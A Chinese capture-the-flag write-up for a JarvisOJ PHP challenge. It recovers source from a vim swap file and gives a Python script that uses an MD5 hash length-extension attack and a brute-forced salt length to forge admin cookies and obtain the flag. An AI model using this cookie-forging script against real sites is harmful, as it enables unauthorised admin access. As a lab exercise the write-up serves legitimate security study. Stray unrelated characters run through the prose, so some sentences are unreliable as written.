2019-10-02 JarvisOj flag在管理員手里 WriteUp

這題真的學(xué)到超多收苏!
要點(diǎn):

  1. vim留下的臨時(shí)文件
  2. 反序列化忽略多余字符串
  3. HASH拓展攻擊

參考了以下題解及文章:

  1. http://www.reibang.com/p/5342d07a6956
  2. http://element-ui.cn/news_show_25227.shtml
  3. https://www.cnblogs.com/pcat/p/5478509.html

Notes:
MD5拓展攻擊時(shí),由于Salt不知道長(zhǎng)度,可以用爆破法求得長(zhǎng)度

Step1:

發(fā)現(xiàn)發(fā)送一次請(qǐng)求后被設(shè)置了Cookie

Cookie: role=s%3A5%3A%22guest%22%3B; hsh=3a4727d57463f122833d9e732f94e4e0

Decode之后為

Cookie: role=s:5:"guest";; hsh=3a4727d57463f122833d9e732f94e4e0

顯然衰琐,要把role改為admin,并且根據(jù)字符串格式可見(jiàn)是PHP序列化字符串藤抡,直接修改無(wú)效厉熟,推測(cè)要符合hsh值
束手無(wú)策,看了題解溉潭,下一步考察源碼泄露净响,可以用掃描器掃描也可以,這里是vim臨時(shí)文件導(dǎo)致的文件泄露
下載http://web.jarvisoj.com:32778/index.php~并且更名為.index.php.swp
輸入命令vi -r index.php成功恢復(fù)index.php文件喳瓣,獲取到源代碼

<!DOCTYPE html>
<html>
<head>
<title>Web 350</title>
<style type="text/css">
    body {
        background:gray;
        text-align:center;
    }
</style>
</head>

<body>
    <?php 
        $auth = false;
        $role = "guest";
        $salt = 
        if (isset($_COOKIE["role"])) {
            $role = unserialize($_COOKIE["role"]);
            $hsh = $_COOKIE["hsh"];
            if ($role==="admin" && $hsh === md5($salt.strrev($_COOKIE["role"]))) {
                $auth = true;
            } else {
                $auth = false;
            }
        } else {
            $s = serialize($role);
            setcookie('role',$s);
            $hsh = md5($salt.strrev($s));
            setcookie('hsh',$hsh);
        }
        if ($auth) {
            echo "<h3>Welcome Admin. Your flag is 
        } else {
            echo "<h3>Only Admin can see the flag!!</h3>";
        }
    ?>
    
</body>
</html>

要點(diǎn)代碼:
unserialize()會(huì)忽略多余的字符
md5($salt.strrev($_COOKIE["role"]))參數(shù)會(huì)反轉(zhuǎn)馋贤,所以和unserialize()結(jié)合只需要構(gòu)造
's:5:"admin"; +填充字符+s:5:"guest";'即可構(gòu)成Hash拓展攻擊

Hash拓展攻擊參見(jiàn):https://xz.aliyun.com/t/2563

由于不知道salt的長(zhǎng)度,所以寫(xiě)一個(gè)腳本爆破salt的長(zhǎng)度畏陕,我寫(xiě)的腳本貼在下方

import requests,urllib
from hashpumpy import hashpump
def attack():
    url="http://web.jarvisoj.com:32778/"
    hsh="3a4727d57463f122833d9e732f94e4e0"
    guestS='s:5:"guest";'[::-1]
    adminS='s:5:"admin";'[::-1]
    i=0
    html='Only'
    newHsh=''
    message=''
    while ('Only' in html):
        print("Tring Salt length:",i)
        newHsh,message=hashpump(hsh,guestS,adminS,i)
        message=message[::-1]
        payload={"role":urllib.parse.quote(message),"hsh":newHsh}
        html=requests.get(url,cookies=payload).text
        i+=1
    print("SaltLength:%d\nMessage:%s\nquotedMessage:%s\nHsh:%s\nHtml:\n%s\n"%(i,message,urllib.parse.quote(message),newHsh,html))

if __name__ == '__main__':
    attack()

成功得到FlagPCTF{H45h_ext3ndeR_i5_easy_to_us3}

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末配乓,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子惠毁,更是在濱河造成了極大的恐慌犹芹,老刑警劉巖,帶你破解...
    沈念sama閱讀 218,941評(píng)論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件鞠绰,死亡現(xiàn)場(chǎng)離奇詭異腰埂,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)洞豁,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,397評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門(mén)盐固,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)荒给,“玉大人丈挟,你說(shuō)我怎么就攤上這事≈镜纾” “怎么了曙咽?”我有些...
    開(kāi)封第一講書(shū)人閱讀 165,345評(píng)論 0 356
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)挑辆。 經(jīng)常有香客問(wèn)我例朱,道長(zhǎng),這世上最難降的妖魔是什么鱼蝉? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,851評(píng)論 1 295
  • 正文 為了忘掉前任洒嗤,我火速辦了婚禮,結(jié)果婚禮上魁亦,老公的妹妹穿的比我還像新娘渔隶。我一直安慰自己,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,868評(píng)論 6 392
  • 文/花漫 我一把揭開(kāi)白布间唉。 她就那樣靜靜地躺著绞灼,像睡著了一般。 火紅的嫁衣襯著肌膚如雪呈野。 梳的紋絲不亂的頭發(fā)上低矮,一...
    開(kāi)封第一講書(shū)人閱讀 51,688評(píng)論 1 305
  • 那天,我揣著相機(jī)與錄音被冒,去河邊找鬼军掂。 笑死,一個(gè)胖子當(dāng)著我的面吹牛昨悼,可吹牛的內(nèi)容都是我干的良姆。 我是一名探鬼主播,決...
    沈念sama閱讀 40,414評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼幔戏,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼玛追!你這毒婦竟也來(lái)了?” 一聲冷哼從身側(cè)響起闲延,我...
    開(kāi)封第一講書(shū)人閱讀 39,319評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤痊剖,失蹤者是張志新(化名)和其女友劉穎,沒(méi)想到半個(gè)月后垒玲,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體陆馁,經(jīng)...
    沈念sama閱讀 45,775評(píng)論 1 315
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,945評(píng)論 3 336
  • 正文 我和宋清朗相戀三年合愈,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了叮贩。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 40,096評(píng)論 1 350
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡佛析,死狀恐怖益老,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情寸莫,我是刑警寧澤捺萌,帶...
    沈念sama閱讀 35,789評(píng)論 5 346
  • 正文 年R本政府宣布,位于F島的核電站膘茎,受9級(jí)特大地震影響桃纯,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜披坏,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,437評(píng)論 3 331
  • 文/蒙蒙 一态坦、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧棒拂,春花似錦伞梯、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,993評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)琐旁。三九已至,卻和暖如春猜绣,著一層夾襖步出監(jiān)牢的瞬間灰殴,已是汗流浹背。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 33,107評(píng)論 1 271
  • 我被黑心中介騙來(lái)泰國(guó)打工掰邢, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留牺陶,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 48,308評(píng)論 3 372
  • 正文 我出身青樓辣之,卻偏偏與公主長(zhǎng)得像掰伸,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子怀估,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,037評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容